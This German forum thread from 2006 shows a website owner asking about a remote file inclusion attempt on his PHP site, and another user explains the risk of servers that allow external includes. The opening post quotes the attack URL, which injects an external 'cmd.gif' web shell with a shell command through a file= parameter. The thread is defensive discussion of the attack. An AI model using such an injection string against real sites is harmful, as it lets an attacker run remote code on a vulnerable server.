Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Hab mal ein Frage wegen Trojana gif bzw. hackversuch

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 28.03.2006, 20:12   #1
anit-trojana
 
Hab mal ein Frage wegen Trojana gif bzw. hackversuch - Icon23

Hab mal ein Frage wegen Trojana gif bzw. hackversuch



Also bei mir auf der Webseite hat heute einer öfters versucht eine fremde Domain zu includen.
Das Was er versucht hat sieht so aus
h**p://meineDomain.de/include.php?file= und hat das dann angehängt h**p://br.geocities.lasichweg/cmdsharkhackers/cmd.gif?&cmd=ls hab mir dann mal die Seite angeschaut und sichtbar war nur ein gif und schon geht ein Fenster auf Trojana wurde aber gleich gelöscht hab dann mal im Quelltext rein geschaut und den mag ich hier mal rein Posten

[edit]
...
[/edit]

Hab zwar nicht viel plan aber der Quelltext sieht für mich nicht gerade freundlich aus,
jetzt zur frage ist es möglich das man fremde Domains von aussehen mit includen kann und die Domain irgend welch Scripte ausführen kann das wehre ja der Oberhammer also damit meine ich wenn er mit seinen Browser von aussehen noch irgend etwas anhängt an meine Domain.
Wenn einer irgend ein plan hat was der Vorgehabt hat bitte hier rein Posten, weil der Quelltext nicht freundlich geschrieben wurde. Bin ja echt Froh das McAfee den Trojana gleich gelöscht hat, aber weis jetzt nicht was der Fratzenkopf auf meiner Webseite versucht hat.

Auf jeden fall schon mal vielen Dank
man mit was man sich alles rum plagen muss html, php, flash, und jetzt noch Trojana also wer den Computer erfunden hat gehört gesteinigt smeil

Alt 28.03.2006, 21:05   #2
n_dot_force
Gast
 
Hab mal ein Frage wegen Trojana gif bzw. hackversuch - Standard

Hab mal ein Frage wegen Trojana gif bzw. hackversuch



Zitat:
Zitat von anit-trojana
jetzt zur frage ist es möglich das man fremde Domains von aussehen mit includen kann und die Domain irgend welch Scripte ausführen kann das wehre ja der Oberhammer also damit meine ich wenn er mit seinen Browser von aussehen noch irgend etwas anhängt an meine Domain.
wenn der webserver nicht entsprechend abgesichert ist: klar geht das includen von dateien aus externen quellen.

dient meist dazu (darum auch der include), die webpräsenz zu modifizieren (bzw. infos über ein potentielles ziel zu beschaffen)

die 2. zeile weist ja schon darauf hin...

ich würde empfehlen, dass du deinen webhost/server entsprechend überprüfst (ob er ein includen zulässt).

__________________


Geändert von n_dot_force (28.03.2006 um 21:15 Uhr)

Alt 28.03.2006, 21:49   #3
anit-trojana
 
Hab mal ein Frage wegen Trojana gif bzw. hackversuch - Icon23

Hab mal ein Frage wegen Trojana gif bzw. hackversuch



Also es ist nicht mein Server ich hab nur webspace bei Avanzo aber er last includen zu und hab auch das phpkit bis jetzt hab ich auch seit 2 jahren kein Problem gehabt, aber das war meiner Meinung nach ein Hackversuch. Hab mir jetzt mal unter Seiten angeschaut von der Domain mit dem Trojana da kommt noch auf den Inhaber ärger zu weil er komplett die Seite von yahoo drauf hat hab jetzt auch schon yahoo angeschrieben sie sollen sich mal die seite anschauen ist glaube ich eine fack seite, glaube kaum das yahoo Trojana auf der Page Drauf hat mal schauen was yahoo dazu sagt. Hab mir auf jeden fall schon die Log Daten kopiert, und hoff ein Mal das Er nichts auf den Server drauf bekommen hat werde jetzt auf jeden fall mal die IP sperren.
Danke für die Schnell antwort und eine gute nacht
:aplaus: :aplaus: auf jeden fall werde ich meine page gute im auge haben
__________________

Antwort

Themen zu Hab mal ein Frage wegen Trojana gif bzw. hackversuch
browser, computer, confused, domain, einig, fenster, file, flash, frage, fremde, freundlich, gelöscht, heute, html, include, mcafee, plagen, poste, posten, quelltext, rum, scripte, sichtbar, teufel, trojana, versucht, vielen dank, webseite



Ähnliche Themen: Hab mal ein Frage wegen Trojana gif bzw. hackversuch


  1. Frage wegen der Festplatte !
    Alles rund um Windows - 10.07.2015 (13)
  2. hey leute, ich habe ne frage wegen IP von mein pc
    Log-Analyse und Auswertung - 19.04.2015 (10)
  3. Frage wegen Sicherungspartition
    Alles rund um Windows - 27.01.2015 (5)
  4. Laptop hat ungewöhliche CPU Auslastung / Frage wegen einer SSD
    Alles rund um Windows - 20.02.2014 (6)
  5. McAfee meldet login in mein netzwerk = Hackversuch?
    Plagegeister aller Art und deren Bekämpfung - 25.11.2013 (11)
  6. Frage zu Adminkonto wegen Virenbefall
    Alles rund um Windows - 19.06.2012 (5)
  7. Frage wegen Win-Updates
    Alles rund um Windows - 10.01.2012 (1)
  8. Frage wegen neuen Arbeitsspeicher (RAM)
    Netzwerk und Hardware - 30.10.2010 (3)
  9. Frage wegen angeblichem Hacker
    Plagegeister aller Art und deren Bekämpfung - 28.01.2010 (7)
  10. Frage wegen Überprüfung nach Trojanern
    Log-Analyse und Auswertung - 07.09.2009 (1)
  11. Frage wegen Trojanern
    Log-Analyse und Auswertung - 17.06.2009 (5)
  12. Frage wegen trojanern!
    Log-Analyse und Auswertung - 30.11.2008 (1)
  13. Knoppix dauerhaft installieren - frage wegen MBR
    Alles rund um Mac OSX & Linux - 19.10.2005 (4)
  14. Frage wegen Benutzernamen
    Lob, Kritik und Wünsche - 12.05.2005 (12)
  15. Frage wegen Hijackthis
    Log-Analyse und Auswertung - 14.01.2005 (7)
  16. Frage wegen HiJackThis-Log
    Log-Analyse und Auswertung - 02.11.2004 (1)

Zum Thema Hab mal ein Frage wegen Trojana gif bzw. hackversuch - Also bei mir auf der Webseite hat heute einer öfters versucht eine fremde Domain zu includen. Das Was er versucht hat sieht so aus h**p://meineDomain.de/include.php?file= und hat das dann angehängt - Hab mal ein Frage wegen Trojana gif bzw. hackversuch...
Archiv
Du betrachtest: Hab mal ein Frage wegen Trojana gif bzw. hackversuch auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.